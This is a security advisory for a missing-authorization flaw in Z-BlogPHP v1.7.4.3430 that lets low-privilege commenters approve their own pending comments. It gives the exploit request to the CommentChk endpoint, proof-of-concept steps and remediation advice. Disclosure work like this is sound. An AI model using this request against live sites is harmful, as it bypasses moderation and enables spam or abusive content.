Z-BlogPHP Post-Auth Missing Authorization Allows Low-Privilege Commenters to Approve Their Own Pending Comments

Project: Z-BlogPHP 

Repository: https://github.com/zblogcn/zblogphp 

Affected Version: v1.7.4.3430 

Vulnerability ID: VPLUS-2026-16327

Title: Post-Authentication Authorization Flaw in Z-BlogPHP Allows Commenters to Approve Their Own Pending Comments

Description: A privilege management flaw exists in Z-BlogPHP when comment moderation is enabled. Low-privilege users with the “commenter” role are expected to only view their own comments, but in practice they can directly approve their own comments while those comments are still pending review.

Code analysis shows two key issues:

  1. Admin_CommentMng() filters the comment list by comm_AuthorID=current_user when the user does not have the CommentAll privilege. This allows low-privilege commenters to view their own pending comments in the backend moderation interface.
  2. CheckComment() incorrectly treats cmt->AuthorID == current_user as an authorized condition when the user lacks CommentAll, allowing the comment author to change the IsChecking status of their own comment.

As a result, once comment moderation is enabled, a low-privilege commenter can submit a comment that is initially pending and not publicly visible, then directly invoke the moderation endpoint to approve it without administrator review.

Affected File: zb_system/function/c_system_event.php

Affected Function: CheckComment

Affected Line: 1196

Technical Root Cause: The application does not properly restrict comment moderation actions to privileged users. It incorrectly considers the comment author to be an authorized actor for changing moderation state, which breaks the intended moderation workflow.

Attack Vector: A low-privilege commenter can log in to the backend and access:

/zb_system/cmd.php?act=CommentChk&id=<comment_id>&ischecking=0&csrfToken=<token>

This changes the user’s own comment from pending review to approved.

Proof of Concept: A valid test reproduced the issue with the following sequence:

  1. Administrator enabled comment moderation
  2. Administrator created a low-privilege commenter account and a test article
  3. The commenter submitted a comment
  4. Before approval, the comment was not visible on the frontend
  5. The commenter directly called the CommentChk moderation endpoint
  6. The comment immediately became visible on the frontend

Observed Results:

  • Before self-approval: comment not visible publicly
  • Self-approval request:
    • HTTP 200
  • After self-approval: comment visible publicly

Example Verification Output:

  • comment_id=9
  • before_visible=False
  • HTTP 200
  • after_visible=True

Impact: This vulnerability allows low-privilege users to bypass the site’s comment moderation workflow and publish their own comments without administrator approval. It undermines trust in moderation controls and may enable spam, abusive content, or policy-violating comments to be publicly displayed.

Severity: Medium

CVSS: 6.5

Remediation Recommendations:

  1. Remove the authorization branch in CheckComment() and BatchComment() that allows the comment author to change moderation status.
  2. Restrict comment approval actions to users with CommentAll permission, or other explicitly authorized moderation roles only.
  3. Tighten Admin_CommentMng() so low-privilege commenters cannot access moderation actions or moderation UI elements for their own comments.
  4. Review all comment-related state-changing actions to ensure ownership does not incorrectly imply moderation privilege.